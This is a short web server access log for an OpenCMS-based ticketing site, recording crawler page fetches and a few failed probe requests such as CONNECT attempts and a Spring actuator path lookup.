83.97.73.245 - - [02/Jan/2024:22:06:05 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 -
10.158.0.217 - - [02/Jan/2024:22:08:17 +0100] "GET / HTTP/1.1" 404 -
45.128.232.152 - - [02/Jan/2024:22:09:23 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
66.249.66.138 - - [02/Jan/2024:22:09:33 +0100] "GET /ticket2/opencms/en/venue/?venueid=6AEAE4F9-6A8D-25BD-489B-DC7310A7EAF9 HTTP/1.1" 200 63117
104.243.37.151 - - [02/Jan/2024:22:17:45 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.136 - - [02/Jan/2024:22:28:44 +0100] "GET /ticket2/opencms/en/venue/?venueid=41578BAC-B3C6-A54C-C6C5-8BDAB9EF23A9 HTTP/1.1" 200 63122
66.249.66.136 - - [02/Jan/2024:22:28:46 +0100] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
66.249.66.137 - - [02/Jan/2024:22:28:47 +0100] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
104.243.37.151 - - [02/Jan/2024:22:58:08 +0100] "GET /ticket2/opencms/main.js HTTP/1.1" 404 -
45.128.232.15 - - [02/Jan/2024:23:02:41 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
52.167.144.214 - - [02/Jan/2024:23:05:05 +0100] "GET /ticket2/opencms/en/venue/?venueid=D441DE26-A039-9DEB-7925-37728B4C8DF8 HTTP/1.1" 200 63125
66.249.66.137 - - [02/Jan/2024:23:18:47 +0100] "GET /ticket2/opencms/sv/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4 HTTP/1.1" 200 74777
104.243.37.151 - - [02/Jan/2024:23:38:57 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -